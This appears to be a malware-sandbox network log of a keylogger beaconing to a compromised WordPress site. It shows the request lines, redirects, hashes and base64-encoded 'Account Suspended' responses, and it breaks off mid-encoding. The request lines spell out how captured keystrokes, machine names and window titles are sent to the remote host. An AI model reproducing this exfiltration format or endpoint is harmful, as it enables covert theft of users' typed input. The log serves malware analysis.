aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9Mjo1
NSUyMEFNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
0805e27869e6d75e65e888a76c19984c47d211c3042ce78eccb5fb028decc573
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:55%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 302 Found
Date: Sun, 04 Dec 2016 10:54:59 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:55%20AM
Content-Length: 379
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
53 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:55%20AM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 04/16/01 05:13:02
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:55%20AM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Sun, 04 Dec 2016 10:54:59 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
54 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:55%20AM text/html post.php 302 Found HTML 345.0 B 04/20/01 14:43:49
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT0yOjU1JTIwQU0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
4ef8a9e7c286ffa1a2cfd5bca83be369b7f34124b34b2434465e8720ed338fb1
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:55%20AM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Sun, 04 Dec 2016 10:55:37 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:55%20AM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
55 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:55%20AM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 04/20/01 15:33:37
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
